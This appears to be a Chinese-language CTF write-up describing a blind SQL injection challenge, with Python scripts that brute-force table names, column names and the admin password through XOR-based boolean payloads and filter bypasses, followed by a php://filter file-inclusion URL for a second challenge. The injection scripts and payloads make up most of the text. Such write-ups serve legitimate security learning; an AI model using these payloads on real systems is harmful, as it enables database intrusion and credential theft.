from

()

不等号 <>代替 等号作用
绕过空格过滤,可以用括号隔开

由于 information_schema 已经被禁用了,所以只能暴力拆解表名了:

从sqlmap中拿去 表明和列名字,编写以下脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests
import time
def testTableName(tableName):
url = "http://123.206.31.85:49167/"
data = {"username": "admin'^(select(1)from("+str(tableName)+"))^1#", "password": "123"}
try:
s1 = requests.post(url, timeout=1,data=data)
if "password error!" in str(s1.content,encoding="utf-8"):
print(tableName)
except:
print ("error")
def getDicSendToWeb(fname):
with open(fname,"r") as f:
while True:
s = f.readline()
s = s.replace("\n","")
#print(s)
testTableName(s)
if s == "":
return

if __name__ == '__main__':
getDicSendToWeb("C:\\Users\\heiyi\\Desktop\\common-tables.txt")

爆表明为 admin 爆列名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import requests
import time
def testColumnName(tableName):
url = "http://123.206.31.85:49167/"
data = {"username": "admin'^(select(count("+str(tableName)+"))from(admin))^1#", "password": "123"}
try:
s1 = requests.post(url, timeout=1,data=data)
if "password error!" in str(s1.content,encoding="utf-8"):
print(tableName)
except:
print ("error")
def getDicSendToWeb(fname):
with open(fname,"r") as f:
i = 0
while True:
i = i + 1
s = f.readline()
s = s.replace("\n","")
#print(s)
testColumnName(s)
#print(i,s)
if s == "":
return
if __name__ == '__main__':
getDicSendToWeb("C:\\Users\\heiyi\\Desktop\\common-columns.txt")

得到3个列名 username password id,现在考试爆密码

这里有个小坑,看了别人的代码 mid( from )

我把from写到了mid外面。。。。。然后悲剧了一个小时

最后编写测试密码的函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
def testPasswdName():
s = ""
for i in range(1,60):

for q in "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}+-*/=":
url = "http://123.206.31.85:49167/"
data = {"username": "admin'^(ascii(mid((select(password)from(admin))from("+str(i)+")))<>"+str(ord(q))+")^0#", "password": "123"}
try:
s1 = requests.post(url, timeout=1,data=data)
#print(s1.content)
if "error" in str(s1.content,encoding="utf-8"):
s=s+q
print(i,s)
break

except:
print ("error")

46.文件上传2(湖湘杯)

该题考察文件包含漏洞:
view-source:http://123.206.87.240:9011/?op=php://filter/read=convert.base64-encode/resource=flag
base64解码后得到flag

47.login4

提示是 CBC字节翻转攻击,赶紧查资料

暂时放弃密码学。。等杂项,逆向,pwn基础扎实了再回来看看密码学

 上一篇